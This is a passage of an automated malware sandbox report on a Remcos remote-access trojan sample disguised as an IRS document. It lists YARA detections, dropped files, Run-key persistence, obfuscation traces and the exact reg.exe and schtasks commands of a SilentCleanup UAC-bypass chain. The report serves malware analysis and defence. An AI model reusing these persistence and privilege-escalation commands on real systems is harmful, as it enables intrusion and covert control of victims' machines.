Source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.ieinstal.exe.10530000.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 2.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 2.2.ieinstal.exe.10530000.2.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 16.2.ieinstal.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.ieinstal.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 16.2.ieinstal.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.ieinstal.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@28/7@5/2
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_0040EB33 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,2_2_0040EB33
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10540593 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,2_2_10540593
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 16_2_0018EB33 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,16_2_0018EB33
Contains functionality to check free disk spaceShow sources
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_00405B40 GetDiskFreeSpaceA,12_2_00405B40
Contains functionality to enum processes or threadsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_00409AA0 GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00409AA0
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_00409D73 FindResourceA,LoadResource,LockResource,SizeofResource,2_2_00409D73
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_004111A9 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_004111A9
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\irs Doc Attached.exeFile created: C:\Users\Public\Kaphpos.exeJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_01
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-OMC9Q7
Executes batch filesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Executes visual basic scriptsShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\Kaph.vbs'
Parts of this applications are using Borland Delphi (Probably coded in Delphi)Show sources
Source: C:\Users\user\Desktop\irs Doc Attached.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\irs Doc Attached.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\Public\Kaphkos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\Public\Kaphpos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\Public\Kaphpos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\Public\Kaphkos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\Public\Kaphpos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\Public\Kaphpos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Reads ini filesShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\irs Doc Attached.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Users\user\Desktop\irs Doc Attached.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\irs Doc Attached.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\Public\Kaphpos.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\Public\Kaphpos.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\Public\Kaphpos.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\Public\Kaphpos.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: irs Doc Attached.exeVirustotal: Detection: 12%
Source: irs Doc Attached.exeReversingLabs: Detection: 28%
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\irs Doc Attached.exeFile read: C:\Users\user\Desktop\irs Doc Attached.exeJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\irs Doc Attached.exe 'C:\Users\user\Desktop\irs Doc Attached.exe'
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM '
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\Kaph.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\Kaph.vbs'
Source: unknownProcess created: C:\Users\Public\Kaphkos.exe 'C:\Users\Public\Kaphkos.exe' /disable
Source: unknownProcess created: C:\Users\Public\Kaphpos.exe Kaphpos.exe
Source: unknownProcess created: C:\Users\Public\Kaphkos.exe 'C:\Users\Public\Kaphkos.exe' /disable
Source: unknownProcess created: C:\Users\Public\Kaphpos.exe Kaphpos.exe
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Users\user\Desktop\irs Doc Attached.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
Source: C:\Users\user\Desktop\irs Doc Attached.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' 'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\Yako.bat reg delete hkcu\Environment /v windir /f && REM 'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /IJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\Kaphkos.exe 'C:\Users\Public\Kaphkos.exe' /disableJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\Kaphkos.exe 'C:\Users\Public\Kaphkos.exe' /disableJump to behavior
Source: C:\Users\Public\Kaphkos.exeProcess created: C:\Users\Public\Kaphpos.exe Kaphpos.exeJump to behavior
Source: C:\Users\Public\Kaphpos.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
Source: C:\Users\Public\Kaphkos.exeProcess created: C:\Users\Public\Kaphpos.exe Kaphpos.exeJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\irs Doc Attached.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}\InProcServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Submission file is bigger than most known malware samplesShow sources
Source: irs Doc Attached.exeStatic file information: File size 1316866 > 1048576

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_004099CD LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_004099CD
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\irs Doc Attached.exeCode function: 0_3_034AC5F0 push eax; ret 0_3_034AC62C
Source: C:\Users\user\Desktop\irs Doc Attached.exeCode function: 0_3_034AC5F0 push eax; ret 0_3_034AC62C
Source: C:\Users\user\Desktop\irs Doc Attached.exeCode function: 0_3_034AC5F0 push eax; ret 0_3_034AC62C
Source: C:\Users\user\Desktop\irs Doc Attached.exeCode function: 0_3_0264E13C push 0040635Bh; ret 0_3_0264E18F
Source: C:\Users\user\Desktop\irs Doc Attached.exeCode function: 0_3_0264E13A push 0040635Bh; ret 0_3_0264E18F
Source: C:\Users\user\Desktop\irs Doc Attached.exeCode function: 0_3_0264E558 push 0040675Eh; ret 0_3_0264E592
Source: C:\Users\user\Desktop\irs Doc Attached.exeCode function: 0_3_034AC5F0 push eax; ret 0_3_034AC62C
Source: C:\Users\user\Desktop\irs Doc Attached.exeCode function: 0_3_034AC5F0 push eax; ret 0_3_034AC62C
Source: C:\Users\user\Desktop\irs Doc Attached.exeCode function: 0_3_034AC5F0 push eax; ret 0_3_034AC62C
Source: C:\Users\user\Desktop\irs Doc Attached.exeCode function: 0_3_0264E13C push 0040635Bh; ret 0_3_0264E18F
Source: C:\Users\user\Desktop\irs Doc Attached.exeCode function: 0_3_0264E13A push 0040635Bh; ret 0_3_0264E18F
Source: C:\Users\user\Desktop\irs Doc Attached.exeCode function: 0_3_0264E558 push 0040675Eh; ret 0_3_0264E592
Source: C:\Users\user\Desktop\irs Doc Attached.exeCode function: 0_3_034AC5F0 push eax; ret 0_3_034AC62C
Source: C:\Users\user\Desktop\irs Doc Attached.exeCode function: 0_3_034AC5F0 push eax; ret 0_3_034AC62C
Source: C:\Users\user\Desktop\irs Doc Attached.exeCode function: 0_3_034AC5F0 push eax; ret 0_3_034AC62C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_004139B0 push eax; ret 2_2_004139DE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10545410 push eax; ret 2_2_1054543E
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_00404C68 push 00404C94h; ret 12_2_00404C8C
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_0040846A push 00408492h; ret 12_2_0040848A
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_0040846C push 00408492h; ret 12_2_0040848A
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_00404C2E push 00404C5Ch; ret 12_2_00404C54
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_00404C30 push 00404C5Ch; ret 12_2_00404C54
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_004048C8 push 00404919h; ret 12_2_00404911
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_00404CA0 push 00404F4Ch; ret 12_2_00404F44
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_004081D4 push 00408350h; ret 12_2_00408348
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_00402E2C push eax; ret 12_2_00402E68
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_00404B48 push 00404B74h; ret 12_2_00404B6C
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_00408352 push 004083C3h; ret 12_2_004083BB
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_00408354 push 004083C3h; ret 12_2_004083BB
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_00404B10 push 00404B3Ch; ret 12_2_00404B34
Source: C:\Users\Public\Kaphkos.exeCode function: 12_2_00404F20 push 00404F4Ch; ret 12_2_00404F44

Persistence and Installation Behavior:

barindex
Uses cmd line tools excessively to alter registry or file dataShow sources
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Contains functionality to download and launch executablesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_0040D427 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,2_2_0040D427
Drops PE filesShow sources
Source: C:\Users\user\Desktop\irs Doc Attached.exeFile created: C:\Users\Public\Kaphpos.exeJump to dropped file
Source: C:\Users\user\Desktop\irs Doc Attached.exeFile created: C:\Users\Public\Kaphkos.exeJump to dropped file
Drops PE files to the user directoryShow sources
Source: C:\Users\user\Desktop\irs Doc Attached.exeFile created: C:\Users\Public\Kaphpos.exeJump to dropped file
Source: C:\Users\user\Desktop\irs Doc Attached.exeFile created: C:\Users\Public\Kaphkos.exeJump to dropped file

Boot Survival:

barindex
Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
Source: C:\Users\user\Desktop\irs Doc Attached.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Kaph C:\Users\Public\Kaph.vbsJump to behavior
Drops PE files to the user root directoryShow sources
Source: C:\Users\user\Desktop\irs Doc Attached.exeFile created: C:\Users\Public\Kaphpos.exeJump to dropped file
Source: C:\Users\user\Desktop\irs Doc Attached.exeFile created: C:\Users\Public\Kaphkos.exeJump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Contains functionality to start windows servicesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_004111A9 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_004111A9
Creates an autostart registry keyShow sources
Source: C:\Users\user\Desktop\irs Doc Attached.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KaphJump to behavior
Source: C:\Users\user\Desktop\irs Doc Attached.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KaphJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_004099CD LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_004099CD
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Yara detected Windows Security DisablerShow sources
Source: Yara matchFile source: 00000000.00000003.766854690.00000000026D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.770267102.0000000002694000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1093899010.000000000234C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.761436318.00000000026CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1099014785.0000000002358000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1082855778.00000000023AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.782605619.0000000002678000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1136818613.00000000023A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.763824747.00000000026CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.772963441.0000000002698000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1110307388.0000000002360000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.766435642.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1112897408.0000000002318000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.777186786.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1088712263.000000000230C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1121883396.0000000002364000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.771926452.000000000264C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1133165344.0000000002380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1091775163.000000000236C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.772815757.0000000002670000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000D.00000003.1090365744.0000000002328000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1109366077.000000000237C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1138786105.0000000002324000.00000004.00000001.sdmp, type: MEMORY
